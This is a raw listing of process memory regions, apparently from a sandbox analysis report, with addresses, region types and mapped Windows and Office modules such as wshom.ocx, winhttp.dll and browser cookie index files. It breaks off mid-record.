id = 621
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 622
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 623
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 624
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 625
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 626
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 627
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 628
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 629
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 630
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 631
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 632
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 633
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 634
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 635
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 636
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 637
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 638
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 639
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 640
start_va = 0x9740000
end_va = 0x9840fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009740000"
filename = ""
Region:
id = 641
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 642
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 643
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 644
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 645
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 646
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 647
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 648
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 649
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 650
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 651
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 652
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 653
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 654
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003c30000"
filename = ""
Region:
id = 655
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 656
start_va = 0x9630000
end_va = 0x9730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 657
start_va = 0x9630000
end_va = 0x9e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 658
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 659
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 660
start_va = 0x66520000
end_va = 0x66540fff
monitored = 0
entry_point = 0x6652e356
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 661
start_va = 0x66500000
end_va = 0x66511fff
monitored = 0
entry_point = 0x66501200
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")
Region:
id = 662
start_va = 0x664d0000
end_va = 0x664f9fff
monitored = 0
entry_point = 0x664d13f2
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll")
Region:
id = 663
start_va = 0x3c30000
end_va = 0x3c3bfff
monitored = 0
entry_point = 0x3c3e356
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 664
start_va = 0x4c20000
end_va = 0x4c34fff
monitored = 0
entry_point = 0x4c213f2
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll")
Region:
id = 680
start_va = 0x9e30000
end_va = 0xa0aefff
monitored = 0
entry_point = 0x9e60efa
region_type = mapped_file
name = "explorer.exe"
filename = "\\Windows\\SysWOW64\\explorer.exe" (normalized: "c:\\windows\\syswow64\\explorer.exe")
Region:
id = 681
start_va = 0x8cf0000
end_va = 0x8d2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cf0000"
filename = ""
Region:
id = 682
start_va = 0x9f10000
end_va = 0xa00ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f10000"
filename = ""
Region:
id = 683
start_va = 0x7ef6a000
end_va = 0x7ef6cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef6a000"
filename = ""
Region:
id = 718
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 776
start_va = 0x66460000
end_va = 0x6649afff
monitored = 0
entry_point = 0x664756aa
region_type = mapped_file
name = "msproof7.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msproof7.dll")
Region:
id = 785
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "custom.dic"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic")
Region:
id = 786
start_va = 0x3c30000
end_va = 0x3c3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c30000"
filename = ""
Region:
id = 787
start_va = 0x4b10000
end_va = 0x4b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 791
start_va = 0x3c30000
end_va = 0x3c31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c30000"
filename = ""
Region:
id = 792
start_va = 0x4b10000
end_va = 0x4b10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 793
start_va = 0x9e30000
end_va = 0x9efbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "times.ttf"
filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf")
Region:
id = 794
start_va = 0x9f00000
end_va = 0x9ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009f00000"
filename = ""
Region:
id = 795
start_va = 0xa000000
end_va = 0xa0c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 796
start_va = 0x4c20000
end_va = 0x4c21fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c20000"
filename = ""
Region:
id = 797
start_va = 0x4c30000
end_va = 0x4c31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 798
start_va = 0x4c40000
end_va = 0x4c41fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 799
start_va = 0x4c50000
end_va = 0x4c51fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c50000"
filename = ""
Region:
id = 800
start_va = 0x4ca0000
end_va = 0x4ca0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 801
start_va = 0xa0d0000
end_va = 0xa19dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesbd.ttf"
filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf")
Region:
id = 802
start_va = 0xa0d0000
end_va = 0xa19dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timesbd.ttf"
filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf")
Region:
id = 804
start_va = 0xa1a0000
end_va = 0xa259fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibril.ttf"
filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf")
Region:
id = 805
start_va = 0x4cb0000
end_va = 0x4cb1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 806
start_va = 0x4cc0000
end_va = 0x4cc1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 807
start_va = 0xa260000
end_va = 0xa334fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrili.ttf"
filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf")
Region:
id = 888
start_va = 0x5820000
end_va = 0x5821fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005820000"
filename = ""
Region:
id = 889
start_va = 0x5830000
end_va = 0x5831fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005830000"
filename = ""
Region:
id = 890
start_va = 0x5850000
end_va = 0x5851fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005850000"
filename = ""
Region:
id = 891
start_va = 0x5860000
end_va = 0x5861fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005860000"
filename = ""
Region:
id = 892
start_va = 0x5870000
end_va = 0x5871fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005870000"
filename = ""
Region:
id = 893
start_va = 0x5880000
end_va = 0x5881fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005880000"
filename = ""
Region:
id = 894
start_va = 0xa340000
end_va = 0xa410fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibrii.ttf"
filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf")
Region:
id = 895
start_va = 0x58a0000
end_va = 0x58a1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000058a0000"
filename = ""
Region:
id = 896
start_va = 0x59c0000
end_va = 0x59c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000059c0000"
filename = ""
Region:
id = 897
start_va = 0x5fd0000
end_va = 0x5fd1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005fd0000"
filename = ""
Region:
id = 909
start_va = 0x6080000
end_va = 0x60edfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006080000"
filename = ""
Region:
id = 913
start_va = 0x66d0000
end_va = 0x673dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000066d0000"
filename = ""
Region:
id = 914
start_va = 0xa420000
end_va = 0xa4c9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a420000"
filename = ""
Region:
id = 915
start_va = 0xa4d0000
end_va = 0xa5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4d0000"
filename = ""
Region:
id = 916
start_va = 0x3c30000
end_va = 0x3c30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c30000"
filename = ""
Region:
id = 917
start_va = 0x6890000
end_va = 0x68fdfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006890000"
filename = ""
Region:
id = 937
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 951
start_va = 0x6080000
end_va = 0x60edfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006080000"
filename = ""
Region:
id = 952
start_va = 0x6890000
end_va = 0x68fdfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006890000"
filename = ""
Region:
id = 953
start_va = 0xa5d0000
end_va = 0xadcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a5d0000"
filename = ""
Region:
id = 957
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 1053
start_va = 0x6080000
end_va = 0x60e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisb.ttf"
filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")
Region:
id = 1055
start_va = 0xadd0000
end_va = 0xb19afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000add0000"
filename = ""
Region:
id = 1056
start_va = 0xb1a0000
end_va = 0xb568fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b1a0000"
filename = ""
Region:
id = 1058
start_va = 0x8e70000
end_va = 0x9205fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e70000"
filename = ""
Region:
id = 1059
start_va = 0xb590000
end_va = 0xb5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b590000"
filename = ""
Region:
id = 1060
start_va = 0xb6b0000
end_va = 0xb7affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b6b0000"
filename = ""
Region:
id = 1061
start_va = 0x7ef6a000
end_va = 0x7ef6cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef6a000"
filename = ""
Region:
id = 1244
start_va = 0x66430000
end_va = 0x66454fff
monitored = 0
entry_point = 0x66432b71
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 1245
start_va = 0x75300000
end_va = 0x7530afff
monitored = 0
entry_point = 0x753052a0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll")
Region:
id = 1246
start_va = 0x663c0000
end_va = 0x66420fff
monitored = 0
entry_point = 0x663fbf40
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll")
Region:
id = 1247
start_va = 0x664c0000
end_va = 0x664cefff
monitored = 0
entry_point = 0x664c93d0
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll")
Region:
id = 1605
start_va = 0x66310000
end_va = 0x663b5fff
monitored = 0
entry_point = 0x6637a2f0
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll")
Region:
id = 1606
start_va = 0x664a0000
end_va = 0x664b7fff
monitored = 0
entry_point = 0x664a1335
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll")
Region:
id = 1607
start_va = 0x6890000
end_va = 0x68fdfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006890000"
filename = ""
Region:
id = 1608
start_va = 0x8cc0000
end_va = 0x8d2dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 1609
start_va = 0x8cc0000
end_va = 0x8d4dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 1610
start_va = 0x4c20000
end_va = 0x4c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004c20000"
filename = ""
Region:
id = 1611
start_va = 0x4b10000
end_va = 0x4b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 1612
start_va = 0x4c40000
end_va = 0x4c41fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 1613
start_va = 0x4cb0000
end_va = 0x4cb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 1614
start_va = 0x5820000
end_va = 0x5822fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005820000"
filename = ""
Region:
id = 1615
start_va = 0x5850000
end_va = 0x5850fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005850000"
filename = ""
Region:
id = 1616
start_va = 0x5870000
end_va = 0x5870fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005870000"
filename = ""
Region:
id = 1617
start_va = 0x5890000
end_va = 0x5890fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005890000"
filename = ""
Region:
id = 1618
start_va = 0x58b0000
end_va = 0x58b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000058b0000"
filename = ""
Region:
id = 1619
start_va = 0x68a0000
end_va = 0x68a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000068a0000"
filename = ""
Region:
id = 1620
start_va = 0x662b0000
end_va = 0x66307fff
monitored = 0
entry_point = 0x662b13b4
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")
Region:
id = 1621
start_va = 0x66260000
end_va = 0x662aefff
monitored = 0
entry_point = 0x66261452
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll")
Region:
id = 1622
start_va = 0x74540000
end_va = 0x7455bfff
monitored = 0
entry_point = 0x7454a431
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 1623
start_va = 0x74530000
end_va = 0x74536fff
monitored = 0
entry_point = 0x7453128d
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")
Region:
id = 1624
start_va = 0x66250000
end_va = 0x6625cfff
monitored = 0
entry_point = 0x66252012
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")
Region:
id = 1625
start_va = 0x4c20000
end_va = 0x4c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004c20000"
filename = ""
Region:
id = 1626
start_va = 0x66230000
end_va = 0x66241fff
monitored = 0
entry_point = 0x66233271
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")
Region:
id = 1627
start_va = 0x66220000
end_va = 0x66227fff
monitored = 0
entry_point = 0x662234d3
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll")
Region:
id = 1628
start_va = 0x744e0000
end_va = 0x7451bfff
monitored = 0
entry_point = 0x744e145d
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1629
start_va = 0x74450000
end_va = 0x74454fff
monitored = 0
entry_point = 0x744515df
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 1630
start_va = 0x74440000
end_va = 0x74445fff
monitored = 0
entry_point = 0x74441673
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 1631
start_va = 0x5820000
end_va = 0x5827fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "urlmon.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui")
Region:
id = 1632
start_va = 0x5fc0000
end_va = 0x5fc1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005fc0000"
filename = ""
Region:
id = 1633
start_va = 0x5fe0000
end_va = 0x5feffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 1634
start_va = 0x5ff0000
end_va = 0x5ff7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 1635
start_va = 0x6000000
end_va = 0x600ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 1636
start_va = 0x74560000
end_va = 0x745a3fff
monitored = 0
entry_point = 0x745763f9
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 1637
start_va = 0xadd0000
end_va = 0xaeaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000add0000"
filename = ""
Region:
id = 1638
start_va = 0x74360000
end_va = 0x743b1fff
monitored = 0
entry_point = 0x743614be
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")
Region:
id = 1639
start_va = 0x74340000
end_va = 0x74354fff
monitored = 0
entry_point = 0x743412de
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")
Region:
id = 1640
start_va = 0x74330000
end_va = 0x7433cfff
monitored = 0
entry_point = 0x74331326
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")
Region:
id = 1641
start_va = 0x6010000
end_va = 0x6010fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006010000"
filename = ""
Region:
id = 1642
start_va = 0x6010000
end_va = 0x6010fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006010000"
filename = ""
Region:
id = 1643
start_va = 0x74320000
end_va = 0x74325fff
monitored = 0
entry_point = 0x7432125a
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll")
Region:
id = 1644
start_va = 0xadf0000
end_va = 0xae2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000adf0000"
filename = ""
Region:
id = 1645
start_va = 0xae70000
end_va = 0xaeaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ae70000"
filename = ""
Region:
id = 1646
start_va = 0xaeb0000
end_va = 0xaf9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aeb0000"
filename = ""
Region:
id = 1647
start_va = 0xb070000
end_va = 0xb16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b070000"
filename = ""
Region:
id = 1648
start_va = 0x7ef67000
end_va = 0x7ef69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef67000"
filename = ""
Region:
id = 1649
start_va = 0x68b0000
end_va = 0x68cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000068b0000"
filename = ""
Region:
id = 1650
start_va = 0x74400000
end_va = 0x74405fff
monitored = 0
entry_point = 0x744014b2
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")
Region:
id = 1651
start_va = 0x743c0000
end_va = 0x743f7fff
monitored = 0
entry_point = 0x743c990e
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")
Region:
id = 1652
start_va = 0x8cc0000
end_va = 0x8d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008cc0000"
filename = ""
Region:
id = 1653
start_va = 0x661e0000
end_va = 0x6621efff
monitored = 0
entry_point = 0x661e2351
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")
Region:
id = 1654
start_va = 0x66110000
end_va = 0x661d1fff
monitored = 0
entry_point = 0x6611119a
region_type = mapped_file
name = "webservices.dll"
filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll")
Region:
id = 1655
start_va = 0x6020000
end_va = 0x602ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006020000"
filename = ""
Region:
id = 1656
start_va = 0x4c20000
end_va = 0x4c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004c20000"
filename = ""
Region:
id = 1657
start_va = 0xfa0000
